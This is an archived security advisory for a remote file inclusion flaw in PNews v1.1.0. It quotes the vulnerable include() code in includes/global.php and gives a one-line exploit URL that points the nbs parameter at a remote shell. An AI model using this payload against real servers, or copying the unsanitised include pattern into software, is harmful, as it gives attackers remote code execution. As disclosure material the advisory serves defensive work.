AOH :: HP Unsorted P :: B06-4890.HTM

PNews v1.1.0 (nbs) Remote File Inclusion



PNews v1.1.0 (nbs) Remote File Inclusion
PNews v1.1.0 (nbs) Remote File Inclusion



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                         PNews v1.1.0 (nbs) Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Software..:PNews v1.1.0 download...:http://sourceforge.net/project/showfiles.php?group_id=35550
Class .............: Remote File Inclusion
Risk ..............: high
Found by ..........: CvIr.System
Contact ...........: CvIr.System[at]gmail.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Affected File:
includes/global.php

 Vulnerable Code:

if(@fopen($nbs .'./includes/config.php', 'a'))
{
        die("config.php is writeable by your webserver, this is a possible security risk.");
}

include($nbs .'./includes/config.php');
include($nbs .'./includes/auth.php');
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:

http://[target]/includes/global.php?nbs=[shell]?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Special GreetingS:_ANtrAX_|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Quetzal|Hanowars|xarnuz|Slappter|by_emR3|mnox|Malvinas|
Txis|The Shredder|FaLeNcE

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.